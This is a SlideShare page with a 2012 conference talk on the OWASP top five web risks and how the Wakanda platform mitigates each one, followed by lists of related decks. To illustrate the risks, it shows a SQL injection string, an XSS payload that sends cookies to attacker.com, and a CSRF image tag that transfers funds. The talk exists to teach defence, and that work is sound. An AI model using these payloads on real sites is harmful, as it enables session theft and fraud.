SlideShare une entreprise Scribd logo

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

Alexandre Morgaut
Alexandre Morgaut
Technologie
1  sur  33
Télécharger pour lire hors ligne
Wakanda and the Top 5 Security Risks by Alexandre Morgaut
Presentation • Wakanda Community manager • W3C AC member • Web Architect • JS Expert, REST Lover, NoSQL Fanboy • W3C “jseverywhere“ community group @amorgaut
Agenda • The Open Web Application Security Project • Top 10 Application Security Risks • Zoom on Top 5 • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF)
OWASP • The Open Web Application Security Project • started in 2001 by Mark Curphey and Dennis Groves • includes corporations, educational organizations, and individuals • Cheat Sheets, Training, Books • AppSec Conferences • TOP 10 Security Risks https://www.owasp.org
Top 10 Risks • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF) • A6 - Security Misconfiguration • A7 - Insecure Cryptographic Storage • A8 - Failure to Restrict URL Access • A9 - Insufficient Transport Layer Protection • A10 - Unvalidated Redirects and Forwards
Injection • Attacks • SQL Injections, JS injections • deferred Injections
SQL Injection query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'"; http://example.com/app/accountView?id=' or '1'='1
Injection • Attacks • SQL Injections, JS injections • deferred Injections • Preventions • Input check, query parameters • Eval is Evil • new Function() == deferred eval() • no dynamically created JS query expression
Wakanda Security • NoSQL • Query parameters • User Access Right at the Database level • CRUD + execution Access Rights • Restricting queries • onRestrictingQuery handler
Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI
XSS Attack
XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>";
XSS Attack page += "<input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'>"; http://example.com/?CC='><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'.
Cross-Site Scripting (XSS) • Attacks • stored, reflected, DOM based • JS injection in the UI • Prevention • validate any input • escape output
Wakanda Security • Static HTML files • Data inclusion based on datasources • output escaped by default • Beware • WYSIWYG widget + on Row Draw • deferred effect
Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking
Broken Authentication & Session Management http://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
Broken Authentication & Session Management • Attacks • session fixation in URL or Form • session hijacking • Prevention • check session owner • session in HTTP only cookie • reasonable timeout
Wakanda Security • Session IDs managed automatically • HTTP only restriction • No session ID in URL or Form • Check of user session owner • Check of user-agent session owner
Insecure Direct Object Reference • Attacks • changed accessed resource URL
Insecure Direct Object Reference
Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( );
Insecure Direct Object Reference query = "SELECT * FROM accts WHERE account = ?"; pstmt = connection.prepareStatement(query , ... ); pstmt.setString( 1, request.getparameter("acct")); results = pstmt.executeQuery( ); http://example.com/app/accountInfo?acct=notmyacct
Insecure Direct Object Reference • Attacks • changed accessed resource URL • Prevention • Indirect resource reference • Check all resource access rights
Wakanda Security • Access always checked by the REST API • User Authenticated at database level • Restricting Queries • Extended DataClass • Current User or Current Group check
Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) Transfert API
Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243
Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL
Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL <img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#“ width="0" height="0">
Cross-Site Request Forgery (CSRF) • Attacks • HTTP request unintentionally sent • Prevention • validate any input • use URL manipulations APIs • escape output • use Tokens in forms
TOP 10 Risks https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Recommandé

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 

Recommandé

A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014PCI security requirements secure coding and code review 2014
PCI security requirements secure coding and code review 2014Haitham Raik
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Cyber ppt
Cyber pptCyber ppt
Cyber pptkarthik menon
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Dakiry
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASPIsuru Samaraweera
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Stormpath
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
AuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formAuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formDiana Pinchuk
 
Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Duo Security
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding GuideGeoffrey Vandiest
 

Contenu connexe

Tendances

OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & TestingDeepu S Nath
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10InnoTech
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Dakiry
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Stormpath
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
AuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formAuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formDiana Pinchuk
 

Tendances (20)

OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Web application security & Testing
Web application security & TestingWeb application security & Testing
Web application security & Testing
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
Діана Пінчук "Як відрізнити авторизацію від аутентифікації та перестати бояти...
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)Secure Your REST API (The Right Way)
Secure Your REST API (The Right Way)
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
AuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login formAuthN & AuthZ testing: it’s not only about the login form
AuthN & AuthZ testing: it’s not only about the login form
 

Similaire à Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Duo Security
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenSqreen
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application DefenseFrank Kim
 
Web security
Web securityWeb security
Web securitySync.NET
 
The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy AntonDevSecCon
 
Secure software development presentation
Secure software development presentationSecure software development presentation
Secure software development presentationMahdi Dolati
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcKaty Anton
 
Web Security Threats and Solutions
Web Security Threats and Solutions Web Security Threats and Solutions
Web Security Threats and Solutions Ivo Andreev
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Lostar
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015devObjective
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 

Similaire à Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe (20)

Making Web Development "Secure By Default"
Making Web Development "Secure By Default" Making Web Development "Secure By Default"
Making Web Development "Secure By Default"
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Identifying XSS Vulnerabilities
Identifying XSS VulnerabilitiesIdentifying XSS Vulnerabilities
Identifying XSS Vulnerabilities
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Modern Web Application Defense
Modern Web Application DefenseModern Web Application Defense
Modern Web Application Defense
 
Web security
Web securityWeb security
Web security
 
The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy Anton
 
Secure software development presentation
Secure software development presentationSecure software development presentation
Secure software development presentation
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwc
 
Web Security Threats and Solutions
Web Security Threats and Solutions Web Security Threats and Solutions
Web Security Threats and Solutions
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Web hackingtools cf-summit2014
Web hackingtools cf-summit2014Web hackingtools cf-summit2014
Web hackingtools cf-summit2014
 

Plus de Alexandre Morgaut

Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...Alexandre Morgaut
 
Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017Alexandre Morgaut
 
angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42Alexandre Morgaut
 
Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012Alexandre Morgaut
 
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014Alexandre Morgaut
 
HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014Alexandre Morgaut
 
JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)Alexandre Morgaut
 
Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)Alexandre Morgaut
 
End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013Alexandre Morgaut
 
From Web App Model Design to Production with Wakanda
From Web App Model Design to Production with WakandaFrom Web App Model Design to Production with Wakanda
From Web App Model Design to Production with WakandaAlexandre Morgaut
 
NoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyNoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyAlexandre Morgaut
 
Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29Alexandre Morgaut
 
End to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) EuropeEnd to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) EuropeAlexandre Morgaut
 
End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012Alexandre Morgaut
 
NoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love StoryNoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love StoryAlexandre Morgaut
 
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012Alexandre Morgaut
 
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012Alexandre Morgaut
 
State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012Alexandre Morgaut
 
Etat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS GeneveEtat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS GeneveAlexandre Morgaut
 

Plus de Alexandre Morgaut (20)

Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
Lint, coverage, doc, autocompletion, transpilation, minification... powered b...
 
Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017Past, present, and future of web assembly - Devfest Nantes 2017
Past, present, and future of web assembly - Devfest Nantes 2017
 
angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42angular-wakanda ngParis meetup 15 at 42
angular-wakanda ngParis meetup 15 at 42
 
Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012Carnet de Route du Développeur - ENSIMAG 2012
Carnet de Route du Développeur - ENSIMAG 2012
 
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
Conquer Architectural Challenges with End-to-End JavaScript - enterJS 2014
 
HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014HTML5 in automotive - web2day 2014
HTML5 in automotive - web2day 2014
 
JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)JS in SMS - JS.everywhere(2013)
JS in SMS - JS.everywhere(2013)
 
Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)Js in Automotive - JS.everywhere(2013)
Js in Automotive - JS.everywhere(2013)
 
End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013End-to-end HTML5 APIs - The Geek Gathering 2013
End-to-end HTML5 APIs - The Geek Gathering 2013
 
From Web App Model Design to Production with Wakanda
From Web App Model Design to Production with WakandaFrom Web App Model Design to Production with Wakanda
From Web App Model Design to Production with Wakanda
 
NoSQL and JavaScript: a love story
NoSQL and JavaScript: a love storyNoSQL and JavaScript: a love story
NoSQL and JavaScript: a love story
 
Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29Wakanda - apps.berlin.js - 2012-11-29
Wakanda - apps.berlin.js - 2012-11-29
 
End to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) EuropeEnd to-end W3C - JS.everywhere(2012) Europe
End to-end W3C - JS.everywhere(2012) Europe
 
End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012End-to-end W3C APIs - tpac 2012
End-to-end W3C APIs - tpac 2012
 
End-to-end W3C APIs
End-to-end W3C APIsEnd-to-end W3C APIs
End-to-end W3C APIs
 
NoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love StoryNoSQL and JavaScript: a Love Story
NoSQL and JavaScript: a Love Story
 
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
Wakanda: NoSQL for Model-Driven Web applications - NoSQL matters 2012
 
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
Wakanda: NoSQL & SSJS for Model-driven Web Applications - SourceDevCon 2012
 
State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012State of the art - server side JavaScript - web-5 2012
State of the art - server side JavaScript - web-5 2012
 
Etat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS GeneveEtat de l'art Server-Side JavaScript - JS Geneve
Etat de l'art Server-Side JavaScript - JS Geneve
 

Dernier

TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
